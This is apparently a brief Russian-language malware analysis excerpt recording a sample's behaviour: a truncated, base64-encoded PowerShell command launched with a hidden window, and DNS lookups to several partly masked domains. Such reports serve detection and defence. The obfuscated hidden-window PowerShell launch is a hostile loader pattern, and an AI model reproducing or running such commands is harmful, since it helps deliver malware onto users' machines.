Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABGAGEAYwB0AG8AcgBzAGkAYQBhAD0AJwBUAEgAWABqAGkAYwAnADsAJABDAHIAZQBkAGkAdABfAEMAYQByAGQAXwBBAGMAYwBvAHUAbgB0AGwAbgBsACAAPQAgACcANQAwADcAJwA7ACQAcwB0AHIAYQB0AGUAZwBpAHoAZQBvAGYAdgA9ACcATgB...
- DNS ASK ch#########icket.cogbiz-infotech.com
- DNS ASK gs###oud.com
- DNS ASK fa#####tierrez.com.br
- DNS ASK gr#####uservicio.com
- DNS ASK it#.##lemiya.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABGAGEAYwB0AG8AcgBzAGkAYQBhAD0AJwBUAEgAWABqAGkAYwAnADsAJABDAHIAZQBkAGkAdABfAEMAYQByAGQAXwBBAGMAYwBvAHUAbgB0AGwAbgBsACAAPQAgACcANQAwADcAJwA7ACQAcwB0AHIAYQB0AGUAZwBpAHoAZQBvAGYAdgA9ACcATgB...' (со скрытым окном)